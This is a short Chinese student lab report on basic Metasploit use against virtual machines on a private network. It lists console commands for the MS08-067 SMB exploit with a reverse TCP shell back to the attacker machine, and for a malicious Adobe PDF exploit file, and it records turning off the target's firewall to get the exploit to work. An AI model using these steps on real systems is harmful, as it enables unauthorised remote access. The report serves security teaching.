Exp5 MSF基础应用
实践目标
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。
实验过程
任务一 主动攻击
使用漏洞:ms08_067
攻击机IP 192.168.40.131
靶机IP(英文版) 192.168.40.129
use exploit/windows/smb/ms08_067_netapi
设置payload,tcp反向回连set payload generic/shell_reverse_tcp
设置攻击机ipset LHOST 192.168.40.131
设置攻击端口set LPORT 4329
设置靶机ip set RHOST 192.168.40.129
设置自动选择目标系统类型 set target 0
居然失败了,关闭防火墙再来一次
成功了!
任务二 针对浏览器的攻击
攻击机IP 192.168.40.131
靶机IP(中文版) 192.168.40.130
任务三 针对Adobe的攻击
Adobe: 9.0
攻击机IP 192.168.40.131
靶机IP(中文版) 192.168.40.130
use exploit/windows/fileformat/adobe_cooltype_sing
将生成的pdf拷贝到靶机,用adobe打开